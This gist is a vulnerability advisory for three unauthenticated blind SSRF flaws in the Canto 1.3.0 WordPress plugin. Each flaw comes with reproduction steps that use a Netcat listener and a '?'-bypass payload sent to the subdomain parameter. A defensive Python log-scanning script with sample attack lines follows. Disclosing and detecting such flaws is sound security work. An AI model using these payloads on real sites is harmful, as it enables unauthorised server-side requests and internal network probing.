Gist p4nk4jv/87aebd999ce4b28063943480e95fd9e0, created November 25, 2020 11:50
# WordPress Plugin Canto 1.3.0 - Blind SSRF Vulnerability

## Multiple Server-Side Request Forgery vulnerabilities found in Canto version 1.3.0

**Description:-**

The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability.
It allows an unauthenticated attacker to make a request to any internal and external server via `/includes/lib/detail.php?subdomain=SSRF`.

**Steps To Reproduce:-**

1. Start a Netcat listener on port 4499.
2. Navigate to `<wordpress_server>/wp-content/plugins/canto/includes/lib/detail.php?subdomain=`
3. Add the attacker's IP and port, e.g. "172.17.0.1:4499?", to the "subdomain=" parameter.
4. Observe the response received from the target.

Note: Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.

**Reference: CVE-2020-28976**

**Description:-**

The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability.
It allows an unauthenticated attacker to make a request to any internal and external server via `/includes/lib/get.php?subdomain=SSRF`.

**Steps To Reproduce:-**

1. Start a Netcat listener on port 4499.
2. Navigate to `<wordpress_server>/wp-content/plugins/canto/includes/lib/get.php?subdomain=`
3. Add the attacker's IP and port, e.g. "172.17.0.1:4499?", to the "subdomain=" parameter.
4. Observe the response received from the target.

Note: Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.

**Reference: CVE-2020-28977**

**Description:-**

The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability.
It allows an unauthenticated attacker to make a request to any internal and external server via `/includes/lib/tree.php?subdomain=SSRF`.

**Steps To Reproduce:-**

1. Start a Netcat listener on port 4499.
2. Navigate to `<wordpress_server>/wp-content/plugins/canto/includes/lib/tree.php?subdomain=`
3. Add the attacker's IP and port, e.g. "172.17.0.1:4499?", to the "subdomain=" parameter.
4. Observe the response received from the target.

Note: Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.

**Reference: CVE-2020-28978**
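
For defenders, an added detection example (not part of the original advisory or the plugin's code): it scans web access logs for requests to the three endpoints above whose `subdomain` value is not a plain hostname label. Assumptions: combined log format, a legitimate `subdomain` is a single DNS label, and the names `suspicious_requests` and `SAMPLE_LOG` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named in the advisory (CVE-2020-28976, -28977, -28978).
PLUGIN_DIR = "/wp-content/plugins/canto/includes/lib/"
ENDPOINTS = {"detail.php", "get.php", "tree.php"}
# Assumption: a legitimate value is one DNS label (letters, digits, hyphens).
DNS_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")
# Client address and request target of a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Nov/2020:11:50:02 +0000] "GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=acme HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [25/Nov/2020:11:51:10 +0000] "GET /wp-content/plugins/canto/includes/lib/get.php?subdomain=172.17.0.1:4499? HTTP/1.1" 200 0 "-" "curl/7.68.0"',
    '198.51.100.23 - - [25/Nov/2020:11:51:44 +0000] "GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=172.17.0.1%3A4499%3F HTTP/1.1" 200 0 "-" "curl/7.68.0"',
    '203.0.113.7 - - [25/Nov/2020:11:52:30 +0000] "GET /wp-login.php?subdomain=172.17.0.1:4499? HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]

def suspicious_requests(lines):
    """Return (client, endpoint, subdomain) for each flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.startswith(PLUGIN_DIR):
            continue
        endpoint = parts.path[len(PLUGIN_DIR):]
        if endpoint not in ENDPOINTS:
            continue
        # parse_qs percent-decodes, so %3A and %3F are compared as ':' and '?'.
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get("subdomain", []):
            if not DNS_LABEL.fullmatch(value):
                hits.append((client, endpoint, value))
    return hits

if __name__ == "__main__":
    for client, endpoint, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} {endpoint} subdomain={value!r}")
```

Because the plugin files are reachable without authentication, any hit in historical logs is worth correlating with outbound connections from the web server at the same timestamp.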